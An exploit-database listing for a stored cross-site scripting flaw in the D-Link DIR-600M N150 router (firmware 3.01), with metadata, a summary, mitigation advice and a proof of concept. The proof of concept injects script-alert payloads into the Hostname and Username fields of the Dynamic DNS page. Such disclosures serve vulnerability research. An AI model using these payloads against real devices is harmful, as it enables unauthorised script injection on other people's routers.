header-logo
Suggest Exploit
vendor:
DIR-600M N150
by:
PUNIT DARJI
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: DIR-600M N150
Affected Version From: DIR-600M Firmware 3.01
Affected Version To: DIR-600M Firmware 3.01
Patch Exists: YES
Related CWE: N/A
CPE: h:d-link:dir-600m_n150
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2018

D-Link Dir-600M N150 – Cross-Site Scripting

A Cross-Site Scripting (XSS) vulnerability was discovered in the D-Link Dir-600M N150 router. An attacker can inject malicious JavaScript code into the 'Hostname' and 'Username' fields of the Dynamic DNS page, which will be executed when the page is loaded by an authenticated user.

Mitigation:

To mitigate this vulnerability, users should ensure that they are running the latest version of the firmware and should not enter any untrusted input into the 'Hostname' and 'Username' fields of the Dynamic DNS page.
Source

Exploit-DB raw data:

# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting
# Date: 2018-09-06
# Exploit Author: PUNIT DARJI
# Vendor Homepage: www.dlink.co.in
# Hardware Link: https://amzn.to/2NUIniO
# Version: DIR-600M Firmware 3.01
# Tested on: Windows 7 ultimate
# CVE: N/A

#POC

Goto your Wifi Router Gateway [i.e: 192.168.X.X ip address of router]
Go to --> "Advance" --> "Dynamic DNS" --> "Hostname"
<script>alert("PSYCHO55")</script>
"Username" --> <script>alert("PunitDarji")</script>
and hit apply Refresh the page, and you will get the 2 pop-up first
"PSYCHO55" and second "PunitDarji".

Navigation

Suggest Exploit

Services By CQR